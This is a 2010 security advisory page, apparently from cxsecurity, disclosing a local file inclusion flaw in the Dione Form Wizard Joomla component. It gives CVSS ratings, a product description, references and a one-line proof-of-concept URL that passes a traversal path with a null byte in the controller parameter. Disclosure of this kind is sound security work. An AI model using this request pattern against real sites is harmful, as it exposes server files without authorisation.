Joomla Component FDione Form Wizard lfi vulnerability

2010.05.28
Credit: Chip D3 Bi0s
Risk: High
Local: No
Remote: Yes
CWE: CWE-22


Ogólna skala CVSS: 7.5/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

----------------------------------------------------------------------------------------- Joomla Component FDione Form Wizard lfi vulnerability ----------------------------------------------------------------------------------------- Author : Chip D3 Bi0s Email : chipdebios[alt+64]gmail.com Date : 2010-05-13 Impact : Exposure of sensitive information Where : From Remote --------------------------------------------------------------------------- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : Dione Form Wizard version : 1.0.2 Developer : Dione Soft Company License : GPL type : Commercial price : $20 Date Added : 9 may 2010 Download : http://dionesoft.com/products/dione_form_wizard/product.html Description : Dione Form Wizard is Joomla! component allows website administrator to create web forms easily through simple drag-and-drop editor. This product gives you the power to create forms that run inside Joomla without requiring knowledge of HTML, MySQL and PHP. The main idea of the Dione Form Wizard is to give a tool that is enabling you to create a dynamic forms in minutes within your Joomla! CMS. --------------------------------------------------------------------------- Poc/Exploit: ~~~~~~~~~ http://127.0.0.1/[path]/index.php?option=com_dioneformwizard&controller=[LFI]%00 +++++++++++++++++++++++++++++++++++++++ #[!] Produced in South America +++++++++++++++++++++++++++++++++++++++

Referencje:

http://xforce.iss.net/xforce/xfdb/58574
http://www.securityfocus.com/bid/40166
http://www.exploit-db.com/exploits/12595
http://secunia.com/advisories/39755
http://packetstormsecurity.org/1005-exploits/joomlafdione-lfi.txt
http://osvdb.org/64633


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top